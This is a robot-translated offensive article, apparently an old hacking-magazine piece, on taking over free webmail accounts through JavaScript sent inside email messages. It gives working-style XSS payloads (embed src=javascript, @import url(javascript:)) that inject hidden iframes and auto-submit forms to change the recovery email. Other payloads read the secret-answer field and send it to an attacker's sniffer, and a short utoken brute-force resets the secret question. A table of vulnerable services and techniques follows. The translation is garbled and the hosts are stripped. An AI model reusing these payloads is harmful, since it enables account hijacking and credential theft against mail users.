This page has been robot translated, sorry for typos if any. Original content here.


We continue to engage in web-mail. I did a little research on various services for hacking and present you the results. The attack technology remains the same: an email with a JavaScript code that is triggered when the email is opened is sent to someone else’s address, and changes any information in the user’s mailbox settings. It makes no sense to describe each server in detail, since the approach is the same everywhere, so I will give a few examples, and at the end a table. In most cases, the hacking can be considered 100%, with some assumptions: the user must use the web interface to read the letters, while writing the exploits I was guided by a standard platform, that is, I initially assume that the user does not have some kind of exotic OS or JS browser disabled.


I'll start with the number 1 post in Russia. At the moment, thanks to the passing of JavaScript and one developer error, it is possible to crack this mailbox. I believe that the basic principles are well known. How to get a password? 1 - unauthorized change it. It will not work, you need to know the previously installed. 2 - change the secret question and use the service to combat amnesia. It will not work either. 3 - set your alternative Email to receive a new, system-generated password. It does not work, the last two options listed above are in the same form and are also password protected. Even the other settings that are of less interest to us (Name, surname, etc.) can no longer be changed without entering the current password. It would seem that there are no options. However, there is such a secondary in importance, inconspicuous settings section "Contact information" (ICQ, website, phone, place of work, time zone, etc.). In this section, you can also specify a contact Email. The trick is that at the same time in the registration information the alternative address changes but the one that is registered in the questionnaire, and now you can get a password for the soap, using the reminder service. It's simple. URL: However, the GET method cannot change settings in the box, therefore I will describe the technical side of the issue in detail.

I. We send a letter with a code to the necessary box with a code that will generate a frame directly in the body of the letter with a link to our website. If possible, the script should work without any user interaction (click, click, mouse over, image loading, etc.):

 <embed src = "javascript: document.getElementById ('xxx'). innerHTML = '<iframe src = http: //> </ iframe>'; this.wav">
 <p id = 'xxx'>
In order to fully ensure the performance of the script, as well as masking, we transform:
 <embed src = "javascript: status = location; document.getElementById ('xxx'). innerHTML = '<iframe src = http: // width = 0 height = 0> </ iframe>' ; this.wav "width = 0 height = 0>
 <p id = 'xxx'>
In this form, character codes replace the letters in the name of the javascript and iframe elements, and the mail script does not filter them. Line status = location; creates the visibility of a local URL in the status bar so that an outside flicker does not arouse suspicion. The width and height attributes, both frame and embed, are set equal to zero and make them invisible.

Ii. On the resource we place an HTML document with the form for sending the changed data to the server.

Content yourscript.html:
 <form method = "post" action = "" name = "anketa"> <br>
 <input type = "hidden" name = "page" value = "2"> <br>
 <input type = "hidden" name = "Email" value = ""> <br>
 <input type = "hidden" value = "Save" name = "Save"> <br>
 </ form> <br>
 <script> <br>
 document.anketa.submit (); <br>
 </ script>
Notes: the work of the client part of the script in unchanged form is guaranteed only for IE; The dispatch form is placed on a separate site specifically to “unload” the letter.


Now a slightly different security bug, for example, If you use the password reminder service, then to get it, just enter the correct answer to your secret question (one of the options). So we set ourselves the task to get this answer. This is done easily. When I went to the properties of the mailbox and scanned the registration information, I saw that the answer to the secret question was not hidden, which allows us to read its value using JavaScript.

We implement the script through the style tag.
Address of the settings page:
Form Name: profileform
The name of the text field with a secret answer: hint_a
As a result, to steal a secret question, you need to call the settings page, run JavaScript, get the value of document.profileform.hint_a.value, and pass it to the sniffer along with the environment variable REQUEST_UR I.

Ready option:
 <style> @import url (javascript: document.getElementById ('out'). innerHTML = "<iframe src = http: // name = 'zero'% 6FnLoad = `str =; path = 'http: //'; = path + str`> </ iframe>" ); </ style>
 <span id = 'out'> </ span>
In the generated frame with the name zero, the settings page is loaded. After the download is complete, the OnLoad handler runs the script for reading the secret question, and then, via the same frame, sends the response to the sniffer. Now just go to, and find the necessary information in the line "Host" .


In my opinion, quite a popular mailer, so I will tell about it in detail. Moreover, it is much easier to get someone else’s account on it than it seems at first glance. You can do this: send an email with a script that, when launched, will receive the session id , generate the necessary requests, and change the settings for the altrenative email (to which the password will be sent later) and the secret question and answer. However, if you specify any other address when reminding you, the password will be sent to it, if only the secret answer is correct. And the following observation: the session id to change the settings can not be used at all. Plus, any tags are allowed. All of the above reduces the amount of code to a couple of lines:
 <iframe src = http: // cp_msg = 1 & cp_quest = QUESTION & cp_answ = ANSWER width = 0 height = 0> </ iframe> 


The hacking method of somewhat does not fit into the general theme of the article, but still - mail :) . When I needed to get a password from one mailbox, I normally registered my account and began to investigate the system. The first thing that caught my eye was the ability to set a new password and a secret question with an answer, without entering the old password. The usual action plan: check the tag filtering, get the ID and execute the request. However, to change the settings, the special variable utoken was used, which is contained in the body of the document. Experimenting with changing the question and answer with the previously known utoken:ВОПРОС&panswer=ОТВЕТ panswer=ВОПРОС&panswer=ОТВЕТ I came to concludes that ID and cookies are not required to change the settings. At the same time, after observing utoken, it was found that the four-digit hexadecimal number after the email address lies in a very narrow range. Namely, in order to establish a secret question with an answer on any box of interest to us, it is necessary to go through a total of 7 options: 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . When the number is guessed, we get into the right box.

Notes: at the moment there have been some changes. The password recovery service does not work, so it makes sense to change it immediately. Address change settings also changed:ВОПРОС&panswer=ОТВЕТ The method does not work forever. Probably, it is still required that the user from time to time went to the mail via the web .

Table with the characteristics of free WWW-servers

img src = javascript: Allows you to read the password from the settings page from the password field , , ,
embed src = javascript: You can change the alternate email , , , , etc.
@ import url (javascript:); The settings show the answer to the secret question. , , ,
Any way Read / change question and answer. Password is valid and
same mailer. about 80 domains
img src = javascript:, style = background: url (javascript:) You can steal the answer to a secret question, if it is installed. It is also possible to set a forwarding address (copies are not saved) OnError, OnLoad Deleting site * (JS is not required) embed src = javasc
ript: this .wav>
Read the answer to your secret question. , , , , , , ,
embed src = "javascript: Swap / steal answer to secret question , , , , and others.
In many ways Account deleting embed src = javascript: Read the secret answer